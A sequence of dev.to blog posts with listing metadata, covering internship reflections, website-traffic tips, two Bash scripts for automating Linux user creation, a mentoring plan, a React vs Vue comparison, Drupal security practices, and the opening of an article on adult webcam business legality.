In summary, both React and Vue are formidable front-end frameworks, each with its distinct features and benefits. Understanding their respective strengths and limitations allows for an informed decision on the best tool for your next web development project. As I begin the HNG 11 internship, I am eager to explore React further and utilize its capabilities to create high-quality solutions. My aim is to maximize this opportunity, gain valuable experience, and achieve exceptional results throughout this year's internship.

**HNG 11**

HNG internship is a coding internship for intermediate developers, designers, and editors. It's a fantastic opportunity to put my skills to the test and work under pressure. I've enrolled in the frontend stack, which means I'll be working with React, preparing me for complex application development in the future. I'm thrilled about this opportunity and looking forward to participating and reaching the final stage of this year's HNG internship.

Check out [HNG website](https://hng.tech/internship) to join the HNG11 internship.
You can also subscribe to [HNG Premium](https://hng.tech/premium) and have special access to more updates and jobs!
clarenceg01
1,909,023
How to Drive Traffic to Your Website
How to Drive Traffic to Your Website: A Comprehensive Guide Driving traffic to your...
0
2024-07-02T14:07:39
https://dev.to/sh20raj/how-to-drive-traffic-to-your-website-3m68
webdev, javascript, beginners, programming
### How to Drive Traffic to Your Website: A Comprehensive Guide

Driving traffic to your website is crucial for increasing brand awareness, generating leads, and achieving your business goals. With so many platforms and strategies available, it's essential to utilize a combination of methods to attract visitors effectively. In this article, we will explore various websites and platforms that can help you drive traffic to your site.

> Ad.
> {% youtube https://www.youtube.com/watch?v=wUVQ0yHZ1SU %}

#### 1. **Search Engines**

**Google**: The king of search engines. By optimizing your website for search engines (SEO), you can improve your visibility in Google's search results. This involves using relevant keywords, creating high-quality content, and building backlinks.

**Bing**: Although less popular than Google, Bing can still drive significant traffic. Implement SEO techniques similar to those used for Google to rank on Bing.

#### 2. **Social Media Platforms**

**Facebook**: Create a business page and regularly post engaging content. Join groups related to your industry and participate in discussions. Use Facebook Ads to target specific demographics and boost your visibility.

**Twitter**: Engage with your followers by sharing interesting content, using hashtags, and participating in trending topics. Twitter Ads can also help you reach a larger audience.

**Instagram**: Share visually appealing content and use features like stories and reels to increase engagement. Utilize relevant hashtags to reach a broader audience.

**LinkedIn**: Post professional content and articles, join industry-related groups, and network with professionals. LinkedIn Ads can help you target specific professional demographics.

**Pinterest**: Share images and infographics related to your niche. Pinterest is particularly effective for driving traffic to blogs and e-commerce sites.

#### 3. **Content Sharing Platforms**

**Medium**: Write and publish articles on Medium to reach its large audience. Medium's algorithm can help your content get discovered by users interested in your topics.

**Quora**: Answer questions related to your industry and provide valuable insights. Include links to your website where relevant.

**Reddit**: Participate in relevant subreddits and share your content where appropriate. Be sure to follow subreddit rules and avoid self-promotion unless it's allowed.

**Slideshare**: Upload presentations related to your industry. Slideshare can drive traffic by showcasing your expertise and linking back to your website.

#### 4. **Online Communities and Forums**

**Stack Overflow**: Answer technical questions and showcase your expertise. Include links to your website in your profile and answers where appropriate.

**Product Hunt**: Launch new products on Product Hunt to gather feedback and attract early adopters.

**Hacker News**: Share tech-related news and articles. Engage with the community to build your reputation and drive traffic to your site.

#### 5. **Content Aggregators and Bookmarking Sites**

**Flipboard**: Curate and share content to attract readers interested in your topics.

**Mix (formerly StumbleUpon)**: Share interesting content to gain visibility and drive traffic.

**Pocket**: Save and share articles. Users can discover your content through Pocket's recommendations.

#### 6. **Video Platforms**

**YouTube**: Create and share videos related to your niche. Include links to your website in the video descriptions and use YouTube's features to engage with viewers.

**Vimeo**: Share high-quality videos with a professional audience. Vimeo's community can help drive targeted traffic to your site.

#### 7. **Email Marketing**

**Mailchimp**: Build and manage email lists, create engaging newsletters, and send targeted email campaigns to drive traffic to your website.

**Sendinblue**: Use Sendinblue to create email campaigns, automate your email marketing, and track results to optimize your strategy.

#### 8. **Advertising Networks**

**Google Ads**: Use pay-per-click advertising to appear in Google's search results and drive targeted traffic to your website.

**Facebook Ads**: Create targeted ad campaigns on Facebook and Instagram to reach specific demographics.

**LinkedIn Ads**: Advertise to professionals on LinkedIn to drive traffic from a targeted professional audience.

**Twitter Ads**: Promote tweets and accounts to increase your visibility on Twitter.

#### 9. **Affiliate Marketing**

**CJ Affiliate**: Partner with affiliates to promote your website and drive traffic through affiliate marketing.

**ShareASale**: Join a network of affiliates to increase your reach and drive more traffic to your site.

#### 10. **Guest Blogging**

Write guest posts for reputable blogs in your industry. This can help you gain exposure, build backlinks, and drive traffic to your website.

#### 11. **Influencer Marketing**

Collaborate with influencers who have a large following in your niche. Influencers can help promote your website to their audience, driving traffic and increasing brand awareness.

#### 12. **Web Directories**

**DMOZ**: Submit your site to the Open Directory Project to increase your visibility and drive traffic. (Note: DMOZ shut down in 2017, so prefer web directories that are still maintained.)

**Yelp**: For local businesses, maintain a profile and gather reviews to attract local traffic.

#### 13. **Online Marketplaces**

**Amazon**: If applicable, sell products on Amazon to drive traffic to your website. Use Amazon's advertising features to increase your visibility.

**Etsy**: For handmade or unique products, use Etsy to reach a larger audience and drive traffic to your site.

### Conclusion

Driving traffic to your website requires a multi-faceted approach. By utilizing search engines, social media platforms, content sharing platforms, online communities, email marketing, advertising networks, affiliate marketing, guest blogging, influencer marketing, web directories, and online marketplaces, you can effectively increase your website's visibility and attract more visitors. Monitor your traffic sources regularly and adjust your strategies to find the most effective methods for your site.
sh20raj
1,909,020
Automating Linux User Creation with Bash Script
Managing users and groups on a Linux system can be a complex and time-consuming task, especially in...
0
2024-07-02T14:03:07
https://dev.to/codereaper0/automating-linux-user-creation-with-bash-script-3p3
Managing users and groups on a Linux system can be a complex and time-consuming task, especially in environments with frequent changes. Automation can significantly simplify this process, ensuring consistency and saving valuable time. In this article, we will walk through the implementation of a Bash script that automates the creation of users and groups, sets up home directories, generates secure random passwords, and logs all actions for auditing purposes.

## **Script Overview**

The Bash script `create_users.sh` reads a list of usernames and groups from a text file, creates the specified users and groups, sets up home directories with appropriate permissions, generates random passwords for the users, and logs all actions. The script also securely stores the generated passwords in a dedicated file.

## **Script Breakdown**

Here is the complete `create_users.sh` script, followed by a detailed explanation of each section:

```
#!/bin/bash

# Ensure the script is run with root privileges
if [ "$EUID" -ne 0 ]; then
  echo "Please run as root"
  exit 1
fi

# Log file path
LOG_FILE="/var/log/user_management.log"

# Password storage file path
PASSWORD_FILE="/var/secure/user_passwords.csv"

# Create secure directory for passwords if it doesn't exist
mkdir -p /var/secure
chmod 700 /var/secure

# Function to create groups
create_groups() {
  local groups="$1"
  IFS=',' read -r -a group_array <<< "$groups"
  for group in "${group_array[@]}"; do
    group=$(echo "$group" | xargs)  # Remove leading/trailing whitespace
    if [ ! -z "$group" ]; then
      if ! getent group "$group" > /dev/null; then
        groupadd "$group"
        echo "Group '$group' created." | tee -a "$LOG_FILE"
      fi
    fi
  done
}

# Function to create user and group
create_user() {
  local username="$1"
  local groups="$2"

  # Create user group if it doesn't exist
  if ! getent group "$username" > /dev/null; then
    groupadd "$username"
    echo "Group '$username' created." | tee -a "$LOG_FILE"
  fi

  # Create the additional groups
  create_groups "$groups"

  # Create user with personal group and home directory if user doesn't exist
  if ! id "$username" > /dev/null 2>&1; then
    useradd -m -g "$username" -G "$groups" "$username"
    echo "User '$username' created with groups '$groups'." | tee -a "$LOG_FILE"

    # Set home directory permissions
    chmod 700 "/home/$username"
    chown "$username:$username" "/home/$username"

    # Generate random password
    password=$(openssl rand -base64 12)
    echo "$username:$password" | chpasswd
    echo "$username,$password" >> "$PASSWORD_FILE"
  else
    echo "User '$username' already exists." | tee -a "$LOG_FILE"
  fi
}

# Read the input file
input_file="$1"
if [ -z "$input_file" ]; then
  echo "Usage: $0 <name-of-text-file>"
  exit 1
fi

# Ensure the input file exists
if [ ! -f "$input_file" ]; then
  echo "File '$input_file' not found!"
  exit 1
fi

# Process each line of the input file
while IFS=';' read -r user groups; do
  user=$(echo "$user" | xargs)      # Remove leading/trailing whitespace
  groups=$(echo "$groups" | xargs)  # Remove leading/trailing whitespace
  if [ ! -z "$user" ]; then
    create_user "$user" "$groups"
  fi
done < "$input_file"

# Set permissions for password file
chmod 600 "$PASSWORD_FILE"

echo "User creation process completed." | tee -a "$LOG_FILE"
```

## Detailed Explanation

**Ensuring Root Privileges**

The script starts by checking if it is being run with root privileges, as creating users and modifying system files require administrative rights.

```
if [ "$EUID" -ne 0 ]; then
  echo "Please run as root"
  exit 1
fi
```

**Setting Up Log and Password Files**

The script defines paths for the log file and the password storage file. It then creates a secure directory for storing passwords and ensures it has the correct permissions.

```
LOG_FILE="/var/log/user_management.log"
PASSWORD_FILE="/var/secure/user_passwords.csv"

mkdir -p /var/secure
chmod 700 /var/secure
```

**Function to Create Groups**

The `create_groups` function takes a comma-separated list of groups and creates each group if it does not already exist. It also logs the creation of each group.

```
create_groups() {
  local groups="$1"
  IFS=',' read -r -a group_array <<< "$groups"
  for group in "${group_array[@]}"; do
    group=$(echo "$group" | xargs)
    if [ ! -z "$group" ]; then
      if ! getent group "$group" > /dev/null; then
        groupadd "$group"
        echo "Group '$group' created." | tee -a "$LOG_FILE"
      fi
    fi
  done
}
```

**Function to Create Users and Groups**

The `create_user` function handles the creation of the user and their primary group, as well as any additional groups. It sets up the user's home directory, assigns appropriate permissions, and generates a random password for the user.

```
create_user() {
  local username="$1"
  local groups="$2"

  if ! getent group "$username" > /dev/null; then
    groupadd "$username"
    echo "Group '$username' created." | tee -a "$LOG_FILE"
  fi

  create_groups "$groups"

  if ! id "$username" > /dev/null 2>&1; then
    useradd -m -g "$username" -G "$groups" "$username"
    echo "User '$username' created with groups '$groups'." | tee -a "$LOG_FILE"
    chmod 700 "/home/$username"
    chown "$username:$username" "/home/$username"
    password=$(openssl rand -base64 12)
    echo "$username:$password" | chpasswd
    echo "$username,$password" >> "$PASSWORD_FILE"
  else
    echo "User '$username' already exists." | tee -a "$LOG_FILE"
  fi
}
```

**Processing the Input File**

The script reads the input file provided as a command-line argument. Each line of the file is expected to contain a username and a list of groups separated by a semicolon. The script processes each line, removing any leading or trailing whitespace, and calls the `create_user` function.

```
input_file="$1"
if [ -z "$input_file" ]; then
  echo "Usage: $0 <name-of-text-file>"
  exit 1
fi

if [ ! -f "$input_file" ]; then
  echo "File '$input_file' not found!"
  exit 1
fi

while IFS=';' read -r user groups; do
  user=$(echo "$user" | xargs)
  groups=$(echo "$groups" | xargs)
  if [ ! -z "$user" ]; then
    create_user "$user" "$groups"
  fi
done < "$input_file"
```

**Finalizing Permissions**

Finally, the script ensures that the password file has the correct permissions, making it readable only by the root user.

```
chmod 600 "$PASSWORD_FILE"
echo "User creation process completed." | tee -a "$LOG_FILE"
```

## Running the Script

To run the `create_users.sh` script, follow these steps:

1. **Create the Input File:** Prepare a text file with usernames and groups. Each line should contain a username followed by a semicolon and a comma-separated list of groups. For example:

   ```
   tella;admins,developers
   boluwatife;users,admins
   ```

2. **Make the Script Executable:** Ensure the script has executable permissions.

   ```
   chmod +x create_users.sh
   ```

3. **Run the Script with Root Privileges:** Execute the script, passing the path to the input file as an argument.

   ```
   sudo ./create_users.sh /path/to/input_file.txt
   ```

## Conclusion

This script provides a robust solution for automating user and group management on a Linux system. It ensures that all actions are logged for auditing purposes and that generated passwords are stored securely. By following the steps outlined in this article, you can customize and extend the script to meet your specific needs, improving efficiency and consistency in user management tasks.

[Link to Github repository](https://github.com/codeReaper0/hng11-devops-stage1)

If you're curious about the [HNG Internship](https://hng.tech/internship), check out their website. And if you're looking to hire developers, head over to [HNG Hire](https://hng.tech/hire).
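The script generates passwords with `openssl rand -base64 12`. If you ever need the same step from Python (say, in a provisioning tool that wraps a script like this), the standard-library `secrets` module is the equivalent cryptographically secure source — a sketch, not part of the original script:

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Build a random password from a mixed alphabet using the
    cryptographically secure `secrets` module (PEP 506)."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*"
    return "".join(secrets.choice(alphabet) for _ in range(length))

# Closest analogue of `openssl rand -base64 12`: 12 random bytes,
# URL-safe base64 encoded.
token = secrets.token_urlsafe(12)
print(generate_password(), token)
```

Unlike the `random` module, `secrets` is suitable for credentials; the alphabet and default length here are illustrative choices, not requirements.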
codereaper0
1,905,141
writing my first mentoring plan
I've recently got into a career mentoring program with my local JuniorDev community which runs for 2...
0
2024-07-02T14:02:58
https://dev.to/ohchloeho/writing-my-first-mentoring-plan-1bpo
career, mentorship, networking
I've recently got into a career mentoring program with my local JuniorDev community which runs for 2 months with check-ins every 2 weeks. Being a mentee, I thought it would be helpful for both my mentors and me to list what I want to learn from them and what I want to achieve at the end of the program.

## 1. Embodying the right mindset

As an IT engineer who has worked on developing and maintaining several systems for my organization, I frequently come across the questions of "How will this help us more than hurt us?" and "Should we do this just because we can?", which return us to the drawing board of whether a certain implementation would cause more problems than the ones it solves. I've realised that I tend to lose focus and clarity on the problem at hand, since distractions are everywhere nowadays. I want to build a mindset that focuses on solving one problem and delivering a solution fast, followed by iteration to make it better and better.

## 2. Interview and workforce preparations

Throwing interview prep into the mix, I lack quite a lot of knowledge about workflows such as Scrum or Agile, Kanban boards, etc., even though I have been working with a few workflows on Jira project boards. I've read that good CI/CD practices are just as important as practicing LeetCode, since working with other developers makes up most of the job.

## 3. Make a decision on the work I want to do / specialise in

As I am someone with plenty of interests, I'm hoping to get some advice on the field of software to be involved in. I'm going to list several of my current interests in tech here based on their priorities:

- Writing programs with Go
- Web-app and application development
- Tinkering with IoT devices, Raspberry Pi, ESP32, etc.

Tech stacks I'm most familiar with:

- JavaScript
- React
- Go

I am intending to specialize in application development, as entry-level jobs in the field are slightly more open to junior candidates, whereas a specialization around my interests such as backend development would require higher levels of experience that I currently don't have.

Let me know what you think about this in the comments, and if you have any idea what I should try specializing in! I will be starting the mentorship program in a week's time, and I hope to be updating my progress here as well. If you have any advice on mentorships for me, please let me know in the comments as well :)
ohchloeho
1,881,459
Are you a Beginner, Intermediate or Expert Programmer?
That is a good question is it not? That is something I have been struggling to figure out. I have...
0
2024-07-02T14:00:00
https://dev.to/anitaolsen/are-you-a-beginner-intermediate-or-expert-programmer-2p8m
discuss
That is a good question, is it not? That is something I have been struggling to figure out. I have been wondering for a while if I am still a beginner, or at least moving towards being intermediate. I am pretty sure I am not an expert, as many things are still very difficult for me (if not too difficult?!) and I feel at times like I know nothing at all 😅

Are you a beginner, intermediate, or expert programmer? And how do you know that?
anitaolsen
1,909,019
Comparing ReactJS and Vue.js: A Comprehensive Guide
In the ever-changing world of web development, choosing the correct front-end technology can be...
0
2024-07-02T13:58:09
https://dev.to/nicholchuks/comparing-reactjs-and-vuejs-a-comprehensive-guide-5a4a
In the ever-changing world of web development, choosing the correct front-end technology can be critical to a project's success. ReactJS and Vue.js have become two of the most well-liked and potent JavaScript frameworks out of all the options available. The purpose of this post is to assist developers in making informed decisions by comparing ReactJS and Vue.js and emphasizing their advantages, disadvantages, and use cases.

## Overview

**ReactJS**

Facebook created and maintains the ReactJS JavaScript library, which is used to create user interfaces, especially for single-page apps. Since its 2013 release, it has experienced tremendous growth in popularity thanks to its virtual DOM, component-based architecture, and one-way data binding.

**Vue.js**

Evan You developed the open-source JavaScript framework Vue.js, which is used to construct user interfaces and single-page apps. Vue.js, which was released in 2014, is renowned for being progressive, flexible, and easy to use, enabling developers to integrate it gradually.

## Core Differences

**Learning Curve**

- ReactJS: When compared with Vue, React has a higher learning curve. Understanding ES6+ features, JSX (a syntax extension for JavaScript), and ideas like state management using Redux or the Context API is necessary.
- Vue.js: Vue is well known for having a low learning curve. It is easy to use and blends in nicely with conventional web technology. The official material is thorough and easy to understand for newcomers.

**Architecture**

- ReactJS: React divides the user interface into reusable components and uses a component-based architecture. To describe the UI, it makes extensive use of JSX and JavaScript.
- Vue.js: Vue takes a more flexible approach while still using a component-based architecture. Developers with traditional web development expertise may find it more comfortable, as Vue templates are written using an HTML-based syntax.

**State Management**

- ReactJS: In order to properly manage application state, state management in React can be complicated and frequently calls for additional libraries like Redux, MobX, or the Context API.
- Vue.js: Vue has an official state management library, Vuex, that works well with the framework. Vuex makes state management easier by giving all components access to a single store.

**Performance**

- ReactJS: React achieves great efficiency by rendering only the components that change and updating its virtual DOM effectively. However, the application's architecture and optimization can have an impact on performance.
- Vue.js: Similar to React in terms of efficiency, Vue likewise makes use of a virtual DOM. Like React, Vue's reactivity mechanism depends on how it is implemented; however, it is a very efficient system overall.

**Ecosystem and Community**

- ReactJS: A wide range of libraries, tools, and extensions are available within the React ecosystem. Its sizable and vibrant community contributes an abundance of tutorials, third-party integrations, and resources.
- Vue.js: While not as large as React's, Vue's ecosystem is expanding quickly. An extensive toolkit is included with Vue CLI, Vue Router, and Vuex right out of the box. With a wealth of lessons and documentation, the community is vibrant and helpful.

**Strengths of ReactJS**

1. Mature Ecosystem: React is suited for complex and extensive applications because of its mature ecosystem, which offers a huge selection of tools, libraries, and extensions.
2. Strong Community Support: Third-party integrations, an abundance of tools, and ongoing developments are all made possible by React's sizable community.
3. Flexibility: React's adaptability gives developers greater control over the development process by enabling them to select the tools and libraries of their choice.
4. Performance: Excellent performance is a result of the virtual DOM and an effective diffing method, particularly in large applications.

**Strengths of Vue.js**

1. Ease of Learning: Both novice and seasoned developers can easily learn Vue thanks to its modest learning curve and comprehensive documentation.
2. Integrated Solutions: Vue streamlines the development process with integrated solutions like Vuex for state management and Vue Router for routing.
3. Flexibility: Without requiring a total rebuild, developers may incorporate Vue into already-existing projects by using it incrementally.
4. Readable Syntax: The code is easier to comprehend and maintain thanks to Vue's HTML-based syntax and clear separation of concerns.

**Use Cases**

- ReactJS: The best choice for complicated state management in large-scale applications, such as social media networks, e-commerce websites, and enterprise-level apps.
- Vue.js: Ideal for prototypes, smaller- to medium-sized projects, and apps where ease of integration and rapid development are critical.

**Conclusion**

ReactJS and Vue.js are two powerful front-end technologies, each possessing distinct advantages and disadvantages. Vue's simplicity and integrated solutions make it a great choice for smaller projects and speedy development, while React's extensive ecosystem and flexibility make it appropriate for large and complicated applications. The decision between ReactJS and Vue.js ultimately comes down to the particular needs of the project, the team's level of knowledge of the respective technologies, and the type of development experience that is wanted. Developers may make well-informed judgments that are in line with the goals and objectives of their projects by knowing the key distinctions and advantages of each framework.

Check out HNG Internship if you want to accelerate your development path; they provide a fast-paced program where you may produce projects and connect with people. [Click on this link for Internship](https://hng.tech/internship) or [Click on this link to Connect](https://hng.tech/hire)
nicholchuks
1,908,752
Automating User Creation and Management with a Bash Script
As a SysOps engineer, automating user creation and management is essential for maintaining system...
0
2024-07-02T13:56:51
https://dev.to/powei_erewejoh_1b18d805c2/automating-user-creation-and-management-with-a-bash-script-2ib2
As a SysOps engineer, automating user creation and management is essential for maintaining system efficiency and security, especially when onboarding new developers. This article presents a robust Bash script to read a text file with usernames and group names, create the necessary users and groups, set up home directories, generate random passwords, and log all actions.

This task was given as part of HNG internship program - more info at [hng internship](https://hng.tech/internship). Find and hire elite freelance talent at https://hng.tech/hire

## Script Overview

The script, `create_users.sh`, performs the following tasks:

1. Read a text file with user and group information.
2. Create users and groups based on the information.
3. Set up home directories with appropriate permissions.
4. Generate random passwords for each user.
5. Log actions to `/var/log/user_management.log`.
6. Store passwords securely in `/var/secure/user_passwords.txt`.

## Script Breakdown

**1. Setting Up Log and Password Files**

We start by defining the paths for the log and password files:

```
LOG_FILE="/var/log/user_management.log"
PASSWORD_FILE="/var/secure/user_passwords.txt"
```

The **setup_files** function ensures these files and directories exist with the correct permissions:

```
setup_files() {
    if [ ! -d "/var/log" ]; then
        mkdir -p "/var/log"
    fi
    if [ ! -f "$LOG_FILE" ]; then
        touch "$LOG_FILE"
        chmod 644 "$LOG_FILE"
    fi
    if [ ! -d "/var/secure" ]; then
        mkdir -p "/var/secure"
    fi
    if [ ! -f "$PASSWORD_FILE" ]; then
        touch "$PASSWORD_FILE"
        chmod 600 "$PASSWORD_FILE"
    fi
}
```

**2. Generating Random Passwords**

The **generate_password** function uses OpenSSL to generate a random password:

```
generate_password() {
    local password=$(openssl rand -base64 12)
    echo "$password"
}
```

**3. Logging Actions**

The **log_action** function logs messages to the log file with timestamps:

```
log_action() {
    local message="$1"
    echo "$(date +'%Y-%m-%d %H:%M:%S') - $message" >> "$LOG_FILE"
}
```

**4. Processing the User File**

The script processes the user file provided as an argument. It reads each line, splits the username and groups, and creates the necessary users and groups:

```
USER_FILE="$1"

if [ ! -f "$USER_FILE" ]; then
    echo "User file not found!"
    exit 1
fi

setup_files

while IFS=';' read -r username groups; do
    username=$(echo "$username" | xargs)
    groups=$(echo "$groups" | xargs)

    if [ -z "$username" ]; then
        continue
    fi

    if id "$username" &>/dev/null; then
        log_action "User $username already exists. Skipping creation."
    else
        if ! getent group "$username" &>/dev/null; then
            groupadd "$username"
            log_action "Created group $username."
        fi

        useradd -m -g "$username" "$username"
        log_action "Created user $username with personal group $username."

        password=$(generate_password)
        echo "$username:$password" | chpasswd
        log_action "Set password for user $username."
        echo "$username:$password" >> "$PASSWORD_FILE"
    fi

    if [ -n "$groups" ]; then
        IFS=',' read -ra group_array <<< "$groups"
        for group in "${group_array[@]}"; do
            group=$(echo "$group" | xargs)
            if ! getent group "$group" &>/dev/null; then
                groupadd "$group"
                log_action "Created group $group."
            fi
            usermod -aG "$group" "$username"
            log_action "Added user $username to group $group."
        done
    fi

    chmod 700 "/home/$username"
    chown "$username:$username" "/home/$username"
    log_action "Set permissions for /home/$username."
done < "$USER_FILE"

log_action "User creation and configuration completed."
```

**Using the Script**

* Save the Script: Save the script as **create_users.sh**.
* Make the Script Executable:

```
chmod u+x create_users.sh
```

* Prepare the User File: Create a text file (e.g., `users.txt`) with the following format:

```
light; sudo,dev,www-data
idimma; sudo
mayowa; dev,www-data
```

* Run the Script:

```
sudo ./create_users.sh users.txt
```

**Explanation of the Script**

1. **Setup Files**: The script first ensures that the log file and secure password file exist and have the appropriate permissions.
2. **Read and Process User File**: It reads the user file line by line, processes each username and associated groups, and handles the creation or modification of users and groups.
3. **Error Handling**: The script checks if users or groups already exist and skips creation if they do, logging the actions appropriately.
4. **Security**: Random passwords are generated for each user and stored securely. Permissions for home directories and the password file ensure security and privacy.
5. **Logging:** All actions are logged to `/var/log/user_management.log` with timestamps for easy auditing and troubleshooting.

### Conclusion

This script automates the tedious task of user creation and management, ensuring consistency and security across your systems. By logging all actions and securely storing passwords, it provides a reliable way to onboard new developers and manage user accounts efficiently.
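The `username; group1,group2` input format is easy to validate before handing a file to the script. A small Python sketch (a hypothetical helper, not part of the article's Bash script) that parses and normalizes one line per record, mirroring the `xargs`-based whitespace trimming above:

```python
def parse_user_line(line: str):
    """Parse 'username; group1,group2' into (username, [groups]).

    Whitespace around the username and each group is stripped,
    matching the Bash script's use of xargs. Blank lines yield None.
    """
    line = line.strip()
    if not line:
        return None
    username, _, groups = line.partition(";")
    group_list = [g.strip() for g in groups.split(",") if g.strip()]
    return username.strip(), group_list

print(parse_user_line("light; sudo,dev,www-data"))
# → ('light', ['sudo', 'dev', 'www-data'])
```

Running such a check first lets you reject malformed lines before any `useradd` call is made, rather than discovering problems halfway through provisioning.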
powei_erewejoh_1b18d805c2
1,909,018
What are the security best practices you follow when developing a Drupal website?
Ensuring the security of a Drupal website is paramount given the frequent cyber threats and...
0
2024-07-02T13:55:32
https://dev.to/chariesdevil/what-are-the-security-best-practices-you-follow-when-developing-a-drupal-website-1i52
drupal, website, development, hire
Ensuring the security of a Drupal website is paramount given the frequent cyber threats and vulnerabilities that can affect web applications. Following best practices in Drupal development helps protect the site, its data, and its users. **Here are the key security best practices for developing a secure Drupal website:** ## 1. Stay Updated One of the simplest yet most effective security measures is keeping your Drupal core, contributed modules, and themes up to date. The Drupal community frequently releases security updates to address vulnerabilities. Staying updated minimizes the risk of known security issues being exploited. **How to Stay Updated:** Regularly check the official Drupal security advisories. Use tools like Drush or Composer to update your Drupal installation. Subscribe to security mailing lists for timely notifications. ## 2. Use Trusted Modules Only use modules and themes from trusted sources. Modules from the official Drupal repository are reviewed and monitored by the community, reducing the risk of introducing vulnerabilities. **Best Practices for Module Selection:** Review the module's usage statistics and community feedback. Ensure the module is actively maintained and updated. Avoid using custom modules unless absolutely necessary, and ensure they are coded securely. ## 3. Implement Strong User Authentication Secure authentication mechanisms are crucial to prevent unauthorized access. **Recommendations:** Enforce strong password policies (e.g., minimum length, complexity requirements). Enable two-factor authentication (2FA) for added security. Use CAPTCHA or reCAPTCHA to prevent automated brute-force attacks. Limit the number of login attempts to prevent brute-force attacks. ## 4. Manage User Roles and Permissions Carefully Drupal’s role-based access control (RBAC) system allows you to assign specific permissions to different user roles. Properly configuring these permissions is essential for security. 
**Tips for Managing Permissions:** Follow the principle of least privilege: only grant permissions that are necessary for each role. Regularly audit roles and permissions to ensure they are correctly configured. Use modules like RoleAudit to review and manage permissions. ## 5. Secure the Database The database is a critical component of a Drupal site, containing all the content and user information. **Database Security Measures:** Use strong, unique passwords for database access. Restrict database access to only necessary users. Regularly back up the database and ensure backups are securely stored. Use database encryption for sensitive data. ## 6. Protect Against Cross-Site Scripting (XSS) XSS attacks involve injecting malicious scripts into web pages viewed by other users. Drupal provides mechanisms to sanitize and escape user input, but developers must use them correctly. **XSS Prevention Strategies:** Use Drupal’s built-in functions like check_plain(), check_markup(), and filter_xss(). Validate and sanitize user inputs before displaying them. Use Content Security Policy (CSP) headers to limit the sources from which scripts can be loaded. ## 7. Prevent Cross-Site Request Forgery (CSRF) CSRF attacks trick users into performing actions on a site they are authenticated to without their knowledge. **CSRF Mitigation Techniques:** Use Drupal’s Form API, which includes built-in CSRF protection. Ensure that state-changing operations (e.g., form submissions) include unique tokens. ## 8. Secure File Uploads File uploads can be a major security risk if not properly managed, allowing attackers to upload malicious files. **File Upload Security Tips:** Restrict allowed file types and validate the file extensions. Store uploaded files outside the web root to prevent direct access. Scan uploaded files for malware. Use modules like FileField Sources to handle file uploads securely. ## 9. 
Use Secure Connections Encrypting data transmitted between the client and the server protects against eavesdropping and man-in-the-middle attacks. **Secure Connection Practices:** Use HTTPS to encrypt data in transit. Implement HTTP Strict Transport Security (HSTS) to enforce HTTPS. Regularly renew and update SSL/TLS certificates. ## 10. Regular Security Audits and Testing Conducting regular security audits and testing helps identify and mitigate potential vulnerabilities. **Security Testing Methods:** Perform regular vulnerability scans using tools like OWASP ZAP. Conduct penetration testing to simulate real-world attack scenarios. Review code for security issues, either manually or using automated tools. ## 11. Implement Security Headers HTTP security headers add an additional layer of security to the website. **Important Security Headers:** Content Security Policy (CSP): Prevents XSS attacks by controlling resources the browser is allowed to load. X-Content-Type-Options: Prevents MIME type sniffing. X-Frame-Options: Prevents clickjacking by controlling whether the site can be framed. Strict-Transport-Security (HSTS): Enforces secure (HTTPS) connections to the server. ## 12. Monitor and Log Activity Monitoring and logging user activity can help detect and respond to suspicious behavior. **Monitoring Best Practices:** Enable logging to track user actions and system events. Use monitoring tools to alert on unusual activities. Regularly review logs for signs of security incidents. ## 13. Educate and Train Your Team Security is a shared responsibility. Ensuring that your team understands and follows security best practices is crucial. **Training Tips:** Conduct regular security training sessions. Encourage developers to stay informed about the latest security threats and best practices. Foster a security-first culture within your organization. 
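As a language-agnostic illustration of the headers listed above (a minimal sketch, not a Drupal API; the header values are common defaults you would tune per site), here is how a response-header map could be augmented:

```python
# Illustrative defaults only; real values depend on your site's needs.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}

def add_security_headers(headers: dict) -> dict:
    """Return a copy of the response headers with security headers applied.

    Existing values are preserved, so an application-level override wins.
    """
    merged = dict(SECURITY_HEADERS)
    merged.update(headers)
    return merged
```

In practice you would set the same headers in your web-server configuration (Nginx/Apache) or via a Drupal module rather than hand-rolling them.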
## Conclusion By following these security best practices, you can significantly reduce the risk of security breaches and ensure that your [Drupal website development](https://devtechnosys.ae/drupal-development) remains secure. Regular updates, careful management of user permissions, secure coding practices, and continuous monitoring are key to maintaining a robust security posture. Security is an ongoing process, and staying vigilant is essential in protecting your site and its users from evolving threats.
chariesdevil
1,909,017
Is Operating an Adult Webcam Business Legal?
In recent years, the adult webcam industry has seen substantial growth, offering lucrative...
0
2024-07-02T13:53:32
https://dev.to/scarlettevans09/is-operating-a-adult-webcam-business-legal-13i
In recent years, the adult webcam industry has seen substantial growth, offering lucrative opportunities for entrepreneurs interested in online entertainment. However, the legality and complexities surrounding operating a webcam business can vary widely depending on jurisdiction and compliance with legal regulations. ## Understanding the Adult Webcam Industry The adult webcam industry revolves around live streaming platforms where performers engage with viewers in real-time. These platforms cater to a diverse audience seeking interactive and personalized adult content. From solo performances to group sessions, the range of services offered is vast, contributing to the industry's popularity and profitability. ## Legal Considerations Before diving into [adult webcam website development](https://adultwebdevelopment.dev/service/adult-webcam-website-development-services/), it's crucial to understand the legal landscape. Laws governing adult entertainment vary significantly between countries and even states or provinces within larger nations. Key legal considerations include: **i. Age Verification:** Strict protocols are often mandated to ensure performers and viewers are of legal age. **ii. Content Regulations:** Guidelines dictate what can and cannot be shown, often requiring adherence to obscenity laws. **iii. Payment Processing:** Ensuring compliance with financial regulations and safeguarding against fraudulent activities. **iv. Privacy and Data Protection:** Upholding user privacy rights and securing sensitive information. ## Steps to Develop an Adult Webcam Website Developing a successful adult webcam website involves meticulous planning and adherence to legal and technical requirements: ### 1. Market Research and Planning **i. Identify Target Audience:** Understanding demographics and preferences is crucial. **ii. Competitive Analysis:** Analyze existing platforms to identify gaps and opportunities. ### 2. Legal Compliance **i. 
